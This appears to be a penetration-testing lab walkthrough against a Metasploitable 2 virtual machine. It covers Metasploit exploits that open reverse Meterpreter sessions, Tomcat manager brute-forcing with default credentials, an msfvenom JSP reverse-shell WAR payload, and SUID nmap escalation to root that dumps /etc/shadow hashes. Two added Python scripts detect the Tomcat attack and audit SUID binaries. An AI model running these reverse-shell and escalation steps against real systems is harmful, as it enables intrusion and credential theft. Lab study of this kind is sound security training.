12 exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315 2023-05-26 excellent Yes Openfire authentication bypass with RCE plugin
13 exploit/multi/http/torchserver_cve_2023_43654 2023-10-03 excellent Yes PyTorch Model Server Registration and Deserialization RCE
14 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection
15 exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc 2021-09-21 manual Yes VMware vCenter vScalation Priv Esc
Interact with a module by name or index. For example info 15, use 15 or use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
msf6 > use 4
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(multi/misc/java_rmi_server) > exploit
[*] Started reverse TCP handler on 192.168.204.137:4444
[*] 192.168.204.136:1099 - Using URL: http://192.168.204.137:8080/qhpKsPkUu
[*] 192.168.204.136:1099 - Server started.
[*] 192.168.204.136:1099 - Sending RMI Header...
[*] 192.168.204.136:1099 - Sending RMI Call...
[*] 192.168.204.136:1099 - Replied to request for payload JAR
[*] Sending stage (57971 bytes) to 192.168.204.136
[*] Meterpreter session 1 opened (192.168.204.137:4444 -> 192.168.204.136:48969) at 2024-04-28 01:50:00 -0400
meterpreter > Interrupt: use the 'exit' command to quit
Port 5432 Postgresql Exploitation - Metasploitable 2
Let us first scan the target.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -p 5432 -sC -sV --script=vuln 192.168.204.136
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 02:06 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.imperialviolet.org/2014/10/14/poodle.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
|_ https://www.securityfocus.com/bid/70574
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.cvedetails.com/cve/2014-0224
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_ http://www.openssl.org/news/secadv_20140605.txt
| vulners:
| cpe:/a:postgresql:postgresql:8.3:
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.78 seconds
Let us exploit it.
msf6 exploit(multi/misc/java_rmi_server) > search postgres
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL
1 post/linux/gather/enum_users_history normal No Linux Gather User History
2 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
3 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution
4 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
5 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
6 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
7 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
8 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection
9 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility
10 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
11 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
12 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe
13 exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
14 exploit/windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution
15 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump
16 auxiliary/scanner/postgres/postgres_schemadump normal No Postgres Schema Dump
17 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
18 exploit/multi/http/rudder_server_sqli_rce 2023-06-16 excellent Yes Rudder Server SQLI Remote Code Execution
19 post/linux/gather/vcenter_secrets_dump 2022-04-15 normal No VMware vCenter Secrets Dump
Interact with a module by name or index. For example info 19, use 19 or use post/linux/gather/vcenter_secrets_dump
msf6 exploit(multi/misc/java_rmi_server) > use exploit/linux/postgres/postgres_payload
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(linux/postgres/postgres_payload) > run
[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(linux/postgres/postgres_payload) > set LHOST 192.168.204.137
LHOST => 192.168.204.137
msf6 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.204.137:4444
[*] 192.168.204.136:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/VaEYRLQK.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.204.136
[*] Meterpreter session 2 opened (192.168.204.137:4444 -> 192.168.204.136:36615) at 2024-04-28 02:10:54 -0400
meterpreter >
Apache Tomcat/Coyote JSP engine 1.1 Exploitation
Run an nmap vulnerability-script scan against the target on the Tomcat port:
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.204.136 -p 8180 --script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 00:22 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
| /admin/:
| JSESSIONID:
| httponly flag not set
| /admin/index.html:
| JSESSIONID:
| httponly flag not set
| /admin/login.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin.html:
| JSESSIONID:
| httponly flag not set
| /admin/account.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin_login.html:
| JSESSIONID:
| httponly flag not set
| /admin/home.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin-login.html:
| JSESSIONID:
| httponly flag not set
| /admin/adminLogin.html:
| JSESSIONID:
| httponly flag not set
| /admin/controlpanel.html:
| JSESSIONID:
| httponly flag not set
| /admin/cp.html:
| JSESSIONID:
| httponly flag not set
| /admin/index.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/home.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/controlpanel.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin-login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/cp.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/account.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin_login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/adminLogin.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html:
| JSESSIONID:
| httponly flag not set
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html:
| JSESSIONID:
| httponly flag not set
| /admin/jscript/upload.html:
| JSESSIONID:
|_ httponly flag not set
| vulners:
| cpe:/a:apache:coyote_http_connector:1.1:
| OSV:BIT-APACHE-2021-31618 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
| OSV:CVE-2023-26044 5.3 https://vulners.com/osv/OSV:CVE-2023-26044
| OSV:CVE-2022-36032 5.3 https://vulners.com/osv/OSV:CVE-2022-36032
| PRION:CVE-2023-26044 5.0 https://vulners.com/prion/PRION:CVE-2023-26044
|_ PRION:CVE-2022-36032 5.0 https://vulners.com/prion/PRION:CVE-2022-36032
|_http-server-header: Apache-Coyote/1.1
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.204.136
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.204.136:8180/admin/
| Form id: username
|_ Form action: j_security_check;jsessionid=42FA811BFEB53FD3B608B245C81FF812
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /admin/login.html: Possible admin folder
| /admin/admin.html: Possible admin folder
| /admin/account.html: Possible admin folder
| /admin/admin_login.html: Possible admin folder
| /admin/home.html: Possible admin folder
| /admin/admin-login.html: Possible admin folder
| /admin/adminLogin.html: Possible admin folder
| /admin/controlpanel.html: Possible admin folder
| /admin/cp.html: Possible admin folder
| /admin/index.jsp: Possible admin folder
| /admin/login.jsp: Possible admin folder
| /admin/admin.jsp: Possible admin folder
| /admin/home.jsp: Possible admin folder
| /admin/controlpanel.jsp: Possible admin folder
| /admin/admin-login.jsp: Possible admin folder
| /admin/cp.jsp: Possible admin folder
| /admin/account.jsp: Possible admin folder
| /admin/admin_login.jsp: Possible admin folder
| /admin/adminLogin.jsp: Possible admin folder
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
| /admin/jscript/upload.html: Lizard Cart/Remote File upload
|_ /webdav/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds
If we browse to the site on port 8180, we can view the Tomcat homepage. The Tomcat manager (/manager/html) requires a username and password.
Metasploit has a module for brute-forcing the manager login credentials:
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOST 192.168.204.136
RHOST => 192.168.204.136
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit
Here we can see the successful login. The credentials are tomcat:tomcat, a default pair taken from the module's wordlist.
[-] 192.168.204.136:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.204.136:8180 - Login Successful: tomcat:tomcat
[-] 192.168.204.136:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.204.136:8180 - LOGIN FAILED: both:manager (Incorrect)
And we are able to log in to the manager with the found credentials.
Looking closely, the manager page has a field for deploying WAR files. Create a payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.204.137 LPORT=4444 -f war >ammar2.war
Now upload it.
Open a netcat listener
nc -nlvp 4444
Now browse to the page.
And we have a connection.
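From the defender's side, the whole sequence above (a burst of failed manager logins, a successful login on a default credential, then a WAR upload) is visible in Tomcat's access log. The following Python script is an added example, not part of the original walkthrough: it parses access-log lines written by Tomcat's AccessLogValve in the default common pattern and raises an alert per source IP for each stage. The sample log lines, the three-failure threshold and the 60-second window are constructed assumptions.

```python
"""Flag Tomcat manager credential guessing followed by a WAR deployment.

Added example, not part of the original walkthrough. Parses access-log lines
written by Tomcat's AccessLogValve in the default "common" pattern
(%h %l %u %t "%r" %s %b) and raises alerts per source IP. Sample lines,
threshold and window are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: three failed guesses, a successful login as the default
# user, a WAR upload, and unrelated traffic from a different host.
SAMPLE_LOG = """\
192.168.204.137 - - [09/Jun/2024:00:30:01 -0400] "GET /manager/html HTTP/1.1" 401 1293
192.168.204.137 - - [09/Jun/2024:00:30:02 -0400] "GET /manager/html HTTP/1.1" 401 1293
192.168.204.137 - - [09/Jun/2024:00:30:02 -0400] "GET /manager/html HTTP/1.1" 401 1293
192.168.204.137 - tomcat [09/Jun/2024:00:30:03 -0400] "GET /manager/html HTTP/1.1" 200 17541
192.168.204.137 - tomcat [09/Jun/2024:00:31:10 -0400] "POST /manager/html/upload HTTP/1.1" 302 -
192.168.204.50 - - [09/Jun/2024:00:31:12 -0400] "GET /index.jsp HTTP/1.1" 200 8421
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    ev["status"] = int(ev["status"])
    return ev


def analyze(log_text, fail_threshold=3, window_s=60):
    """Return a list of alert dicts, in the order the triggering lines appear."""
    failures = defaultdict(list)  # ip -> timestamps of recent 401s on /manager/
    flagged = set()               # ips that crossed the failure threshold
    alerts = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None or not ev["path"].startswith("/manager/"):
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["status"] == 401:
            # sliding window: drop failures older than window_s seconds
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_s]
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= fail_threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"ip": ip, "type": "manager_bruteforce", "count": len(recent)})
        elif (ev["method"] == "POST" and ev["path"].startswith("/manager/html/upload")
              and ev["status"] in (200, 302)):
            # a WAR deployment through the manager UI; always worth logging
            alerts.append({"ip": ip, "type": "war_deploy", "user": ev["user"]})
        elif ev["status"] == 200 and ev["user"] != "-" and ip in flagged:
            # authenticated access right after a guessing burst from the same ip
            alerts.append({"ip": ip, "type": "login_after_guessing", "user": ev["user"]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Run it directly to print the three alerts for the embedded sample; on a real host, feed it the AccessLogValve output (localhost_access_log.*.txt) and tune the threshold to the environment. The mitigation is visible in the module output itself: the login succeeded on a default credential pair, so changing or removing the default manager user in tomcat-users.xml and restricting the manager application to trusted addresses with a RemoteAddrValve closes this path.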
Privilege Escalation with SUID Binaries
Find the binaries with the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
We have a lot of binaries with the SUID bit set; I will use nmap here for the privilege escalation, since this old release (4.53) still has an interactive mode that can spawn a shell, and because the binary is SUID root that shell runs with root privileges.
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=110(tomcat55) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
Our effective UID (euid=0) is root, so the shell spawned from nmap can read /etc/shadow.
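The escalation works only because a binary that has no business being SUID carries the bit. As an added example (not from the original walkthrough), the Python script below audits a SUID listing against a per-host baseline and flags binaries known to give the caller a shell when SUID; it also generates the chmod commands that strip the bit. The find output is a condensed copy of the listing above, while the baseline and the `SHELL_CAPABLE` set are constructed assumptions that a real audit would populate from a freshly built host and a reference such as GTFOBins.

```python
"""Audit SUID binaries against a per-host baseline.

Added example, not part of the original walkthrough. The find output is a
condensed copy of the listing in the walkthrough; BASELINE and SHELL_CAPABLE
are constructed assumptions.
"""
import os
import stat

# Condensed copy of `find / -perm -u=s -type f` from the walkthrough above.
FIND_OUTPUT = """\
/bin/umount
/bin/su
/bin/mount
/bin/ping
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/nmap
/usr/bin/mtr
/usr/bin/at
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
"""

# Constructed baseline: the SUID files this host is expected to have. Generate
# it on a clean build and keep it under configuration management.
BASELINE = {
    "/bin/umount", "/bin/su", "/bin/mount", "/bin/ping",
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/lib/openssh/ssh-keysign",
}

# Binaries that let the caller run commands when SUID. Only the one used in the
# walkthrough is listed here; extend it from GTFOBins for a real audit.
SHELL_CAPABLE = {"/usr/bin/nmap"}


def parse_find_output(text):
    """Turn find's one-path-per-line output into a set of absolute paths."""
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}


def scan_live(root="/"):
    """Walk the filesystem and return regular files with the SUID bit set."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entries are skipped
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def audit(found, baseline=BASELINE, shell_capable=SHELL_CAPABLE):
    """Compare a SUID listing with the baseline and the shell-capable set."""
    return {
        "unexpected": sorted(found - baseline),   # SUID but not in the baseline
        "missing": sorted(baseline - found),      # baseline entries no longer SUID
        "risky": sorted(found & shell_capable),   # present and known shell-capable
    }


def remediation(report):
    """chmod commands that strip the SUID bit from every flagged binary."""
    targets = set(report["unexpected"]) | set(report["risky"])
    return [f"chmod u-s {path}" for path in sorted(targets)]


if __name__ == "__main__":
    report = audit(parse_find_output(FIND_OUTPUT))
    for key, paths in report.items():
        print(f"{key}: {paths}")
    print("\n".join(remediation(report)))
```

Run it as-is to audit the embedded listing; replace `parse_find_output(FIND_OUTPUT)` with `scan_live()` to audit the host it runs on. Removing the SUID bit from nmap, mtr, at and pppd does not break normal use for root, and the baseline diff is the check to schedule so that a newly SUID binary shows up before an attacker finds it.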